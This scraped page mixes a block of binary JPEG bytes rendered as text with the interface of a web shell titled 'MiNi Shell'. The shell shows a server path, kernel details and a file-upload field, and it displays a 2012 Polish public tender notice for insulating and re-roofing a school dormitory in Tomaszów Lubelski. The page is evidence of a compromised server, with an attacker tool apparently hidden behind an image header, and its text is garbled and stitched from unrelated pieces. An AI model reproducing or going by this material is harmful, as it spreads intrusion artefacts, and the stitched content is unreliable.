JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120516/157526-N-2012.html

<p class="kh_header"><b>Tomaszów Lubelski: Termomodernizacja budynków  użyteczności publicznej stanowiących mienie samorządów: miasto Tomaszów Lubelski i powiatu tomaszowskiego - termomodernizacja i przebudowa dachu budynku  internatu Zespołu Szkół Nr 4  w Tomaszowie Lubelskim przy ul. Żwirki i Wigury 5A - Znak sprawy: ZS4.202.3.2012</b><br>
<b>Numer ogłoszenia: 157526 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 4 im. Jarosława Dąbrowskiego w Tomaszowie Lubelskim , ul. Żwirki i Wigury 7, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 84 6659015, faks 84 6659002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zs4.pl/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=76</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków  użyteczności publicznej stanowiących mienie samorządów: miasto Tomaszów Lubelski i powiatu tomaszowskiego - termomodernizacja i przebudowa dachu budynku  internatu Zespołu Szkół Nr 4  w Tomaszowie Lubelskim przy ul. Żwirki i Wigury 5A - Znak sprawy: ZS4.202.3.2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Roboty termomodernizacyjne wynikające z Audytu Energetycznego obejmuje między innymi:
a/ wykonanie docieplenia ściany zewnętrznych styropianem o grubości 13 cm. Metoda lekka, mokra, BSO - bezspoinowy system ociepleń.
Współczynnik przewodzenia ciepła styropianu U<=0,040 W/(mK).
b/wykonanie docieplenia stropu pod dachem matami z wełny mineralnej o grubości 15 cm. Współczynnik przewodzenia ciepła wełny mineralnej U<=0,040 W/(mK).
c/Wymiana starych okien zewnętrznych na nowe z nawiewnikami higrosterowalnymi, 
o współczynniku U<=1,4 W/(m2K) /dla całego okna/
d/ Wymiana starych drzwi zewnętrznych do budynku na nowe, o współczynniku U<=2,0 W/(m2K) /dla całych drzwi/
e/ Zmodernizowanie system c.w.u.: montaż systemu solarnego złożonego z 5 szt. płaskich kolektorów słonecznych, zasobników z grzałkami elektrycznymi oraz wymiana instalacji rozprowadzającej.
f/ Zmodernizowanie systemu c.o.: wymiana instalacji rozprowadzającej wraz z grzejnikami, montaż  przygrzejnikowych zaworów termostatycznych
i automatycznych odpowietrzników na pionach, wymiana zasilania /przebudowa rozdzielaczy
 i odcinka przyłącza c.o. na rury preizolowanej/.
2. Roboty dodatkowe wynikające z robót termomodernizacyjnych, kwalifikowane:
a/ Wymiana parapetów wewnętrznych pod oknami wymienianymi
b/ Odtworzenie opaski wokół budynku /od strony północnej/
c/ Obróbki blacharskie, podsufitki, wymiana rynien i rur spustowych
d/ Wymiana parapetów blaszanych pod oknami
e/ Wykonanie podestów przejściowych na stropie nad piętrem /dojścia do kominów/
f/ Zmiana powierzchni otworów wentylacyjnych na poddaszu, z wstawieniem w części otworów kratek wentylacyjnych nawiewnych 40x40 cm metalowych
g/ Odtworzenie zadaszenia nad wejściem od strony wschodniej i zachodniej
h/ Przebudowa pom. łazienki z wydzieleniem pom. węzła cieplnego. 
i/  Przebudowa / modernizacja /   instalacji odgromowej i oświetlenia zewnętrznego na budynku,
j/ Wykonanie wszelkich innych niezbędnych robót  towarzyszących wynikających
z przepisów prawa budowlanego.
3.Zakres robót remontowych w zakresie przebudowy dachu nie objęty audytem:
a/  Rozbiórka konstrukcji drewnianej dachu,
b/ Wykonanie wieńców żelbetowych na ścianach konstrukcyjnych,
c/ Wykonanie trzpieni żelbetowych,
d/ Wykonanie ścian szczytowych poddasza,
e/ Wykonanie kominów wentylacyjnych,
f/  Wykonanie nowej wieźby dachowej drewnianej płatwiowo - kleszczowej z pokryciem dachu  blachą trapezową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.30.00.00-7, 45.42.11.00-5, 45.30.00.00-0, 45.33.10.00-6, 45.33.11.00-7, 45.42.10.00-4, 45.45.00.00-6, 45.31.11.00-1, 45.26.00.00-7, 09.33.11.00-9, 45.32.00.00-6, 45.40.00.00-1, 45.23.11.12-3, 45.33.20.00-3, 45.33.22.00-5, 45.33.23.00-6, 45.31.60.00-5, 45.31.20.00-7, 45.31.70.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Ustala się wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych).
2.Wadium należy wnieść przed upływem terminu składania ofert. 3.Wadium może być wnoszone w jednej lub kilku następujących formach: a) w pieniądzu, b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; c)gwarancjach
bankowych; d)gwarancjach ubezpieczeniowych; e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm. ). 4.Wadium wnoszone w pieniądzu należy wpłacić przelewem na
rachunek bankowy 09 9620 0005 0000 3593 2001 Bank Spółdzielczy w Łaszczowie. Jako potwierdzenie wniesienia wadium w formie gwarancji lub poręczenia należy dołączyć do oferty /oryginał/. 5.Za skuteczne wniesione wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie zamawiającego. Jako potwierdzenie wniesienia wadium w pieniądzu należy załączyć w ofercie kserokopię polecenia przelewu. 6.Wadium musi obejmować cały okres związania ofertą. 7.Zamawiający zwraca wadium zgodnie z art.46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do wykonawców, którzy: wykażą się wiedzą i doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,wykonaniem co
najmniej jednej roboty budowlanej na budynku użyteczności publicznej lub obiekcie innego rodzaju o powierzchni użytkowej minimum minimum 500 m2 i kubaturze 2000 m3, wykonując na tym obiekcie roboty budowlane o zbliżonym charakterze i funkcji, których sposób realizacji i poziom skomplikowania jest taki sam jak w przypadku inwestycji objętej niniejszym zamówieniem, o wartości co najmniej 500 000,00 zł
brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony przez wykonawców,
którzy: dysponują co najmniej 3 osobami zdolnymi do wykonania zamówienia. Osoby
te:- powinny posiadać określone przepisami Prawa budowlanego kwalifikacje zawodowe konieczne do realizacji zamówienia w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. z 2010r., Dz. U. z 2010 r. nr 243 poz. 1623),
-powinny posiadać min. 5 letnie doświadczenie zawodowe w kierowaniu pracami
budowlanymi w zakresie posiadanych uprawnień budowlanych (funkcja kierownika budowy lub kierownika robót o charakterze zbieżnym z zakresem robót będących przedmiotem projektu i z posiadanymi uprawnieniami), a w szczególności:
a)dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania
robotami budowlanymi w specjalności konstrukcyjno - budowlanej, b)dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania
robotami budowlanymi w zakresie sieci, instalacji i urządzeń wodociągowych ,
kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,
c)dysponują osobę posiadającą uprawnienia budowlane bez ograniczeń do kierowania
robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.
Zamawiający przez spełnienie warunku dotyczącego stażu pracy rozumie pełnienie ww. funkcji po uzyskaniu uprawnień budowlanych zgodnie z obowiązującym w tym zakresie przepisami prawa.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający uzna przedmiotowy warunek za spełniony przez wykonawców, którzy
wykażą posiadanie środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 300 000 zł., oraz fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 500 000 zł. 2. W zakresie warunków udziału w postępowaniu dotyczących dysponowania środkami finansowymi, lub zdolnością kredytową, posiadania ubezpieczenia od odpowiedzialności cywilnej, a także wykazania się doświadczeniem w zakresie wykonania robót budowlanych  w odpowiedniej wysokości, oraz wadium - w celu zapewnienia równego traktowania wykonawców przy dokonywaniu oceny spełniania tych warunków, wartości podane przez Wykonawcę w walutach innych niż złoty polski Zamawiający będzie przeliczał na wartości w złotówkach według kursu średniego danej waluty ogłoszonego przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych i daty
zamieszczenia niniejszej specyfikacji na stronie internetowej Zamawiającego.W zakresie warunków udziału w postępowaniu dotyczącym dysponowania środkami
finansowymi, lub zdolnością kredytową, posiadania ubezpieczenia od odpowiedzialności cywilnej, a także wykazania się doświadczeniem w zakresie wykonania robót budowlanych w odpowiedniej wysokości, oraz w przypadku wadium złożonym w walutach obcych - w celu zapewnienia równego traktowania wykonawców przy dokonywaniu oceny spełnienia tych warunków, wartości podane przez Wykonawcę w walutach innych niż złoty polski Zamawiający będzie przeliczał na wartości w złotówkach według kursu średniego danej waluty ogłoszonego przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Dopuszczalne są następujące przypadki i warunki zmiany umowy :
1) zmniejszenie zakresu przedmiotu zamówienia, gdy jego wykonanie w pierwotnym
zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu
Zamawiającego.
2) zmiany materiałów budowlanych i sprzętu, gdy wykorzystanie materiałów
budowlanych i sprzętu, wskazanych w dokumentacji projektowej lub ofercie stanie się
niemożliwe bądź podyktowane będzie usprawnieniem procesu budowy, postępem
technologicznym, zwiększeniem bezpieczeństwa na budowie pod warunkiem, że
zmiana nastąpi na materiały, i sprzęt posiadające, co najmniej takie same parametry
jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty i pod
warunkiem nie zwiększania ceny,
3) wystąpienia konieczności wykonania zamówień dodatkowych, których realizacja
będzie miała wpływ na harmonogram i termin wykonania przedmiotu umowy,
4) konieczności zmiany harmonogramu robót i finansowania na wniosek
Zamawiającego z przyczyn od niego niezależnych,
5) wystąpienia konieczności wykonania dokumentacji zamiennej, której wykonanie
będzie miało wpływ na termin wykonania przedmiotu umowy,
6) w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie
mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
7) zmiany wysokości wynagrodzenia w związku ze zmianą wysokości podatku VAT
w przypadku zmiany przepisów,
8) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie,
których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać
usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji
jej zapisów przez strony,
9) zmiany terminu realizacji przedmiotu zamówienia, w przypadku :
a) gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie
Zamawiającego w zakresie uzasadnionego interesu Zamawiającego,
b)z powodu działania siły wyższej uniemożliwiającej wykonanie robót w określonym
pierwotnie terminie o czas działania siły wyższej oraz potrzebny do usunięcia
skutków tego działania,
c)konieczności zmniejszenia zakresu przedmiotu zamówienia, gdy jego wykonanie
w pierwotnym zakresie nie leży w interesie Zamawiającego o czas proporcjonalny do
zmniejszonego zakresu,
d)konieczności uzyskania decyzji lub uzgodnień, mogących spowodować
wstrzymanie robót - o czas niezbędny do uzyskania wymaganych decyzji bądź
uzgodnień lub do wykonania dodatkowych ekspertyz, badań,
e) konieczność wykonania zmiany dokumentacji, jej uzupełniania lub uzyskania wyjaśnień od projektanta
2.Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron
wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zs4.pl/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=76<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Nr 4 w  Tomaszowie  Lubelskim, ul. Żwirki i Wigury 7, 22-600 Tomaszów Lubelski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2012 godzina 12:00, miejsce: Zespół Szkół Nr 4 w  Tomaszowie  Lubelskim, ul. Żwirki i Wigury 7, 22-600 Tomaszów Lubelski, pok. nr 6 ( parter- sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest ze środków Narodowego Funduszu Ochrony Środowiska
 i Gospodarki Wodnej w ramach  Programu priorytetowego  System Zielonych Inwestycji  Część 1)  Zarządzanie energią w budynkach użyteczności publicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com